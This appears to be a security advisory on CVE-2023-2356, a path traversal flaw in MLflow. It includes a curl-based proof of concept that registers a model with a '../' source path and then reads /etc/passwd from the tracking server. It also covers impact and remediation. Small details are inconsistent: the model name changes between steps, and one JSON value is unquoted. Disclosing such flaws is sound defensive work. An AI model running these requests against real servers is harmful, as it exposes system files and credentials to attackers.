MLflow Vulnerability: CVE-2023-2356 Exposes Sensitive Data on Tracking Server

MLflow, a widely-used platform for streamlining machine learning development, recently caught the attention of security researchers due to a critical vulnerability, CVE-2023-2356. With a CVSS score of 10, this vulnerability allows attackers to access local server files on the tracking server through a relative path traversal exploit.

Vulnerability Details: CVE-2023-2356

CVE-2023-2356 is a relative path traversal vulnerability that affects MLflow versions prior to 2.3.1. By exploiting this vulnerability, an attacker can access local server files on the tracking server when a subsequent REST API v1.1 call is made. This is achieved by creating a model version through the REST API endpoint and specifying a relative path redirection to the source argument.

Proof of Concept

Researchers have provided a proof of concept for this vulnerability, demonstrating how an attacker can exploit it to access sensitive information. The attack consists of the following steps:

1. Start an MLflow server in default mode: mlflow server
2. Use the REST API to create a model: curl -X POST http://mlflowserver:5000/api/2.0/mlflow/registered-models/create -H “Content-type: application/json” -d ‘{“name”: “AModel”}’
3. Use the REST API to create a model version with a relative path in the source argument: curl -X POST http://mlflowserver:5000/api/2.0/mlflow/model-versions/create -H “Content-type: application/json” -d ‘{“name”: “AModel”, “source”: file://hostname/../../../../../../../}’
4. Retrieve artifacts from the tracking server’s local filesystem: curl http://mlflowserver:5000/model-versions/get-artifact?path=etc/passwd&name=TestModel&version=1

The final step returns the file contents of the local password file, granting the attacker access to sensitive information.

Potential Impact

The CVE-2023-2356 vulnerability poses a significant risk to organizations using MLflow, as it allows attackers to access sensitive local files on the tracking server. The consequences can include:

• Access to sensitive local credentials
• Full access to underlying linked object store accounts
• Hijacking the tracking server with the extracted credentials

Mitigation and Remediation

The MLflow development team will release a patch to address this critical vulnerability in version 2.3.1. Organizations using MLflow should update their software to the latest version as soon as possible to mitigate the risk of exploitation. Additionally, users should restrict access to the MLflow tracking server and ensure that only trusted individuals can interact with the REST API.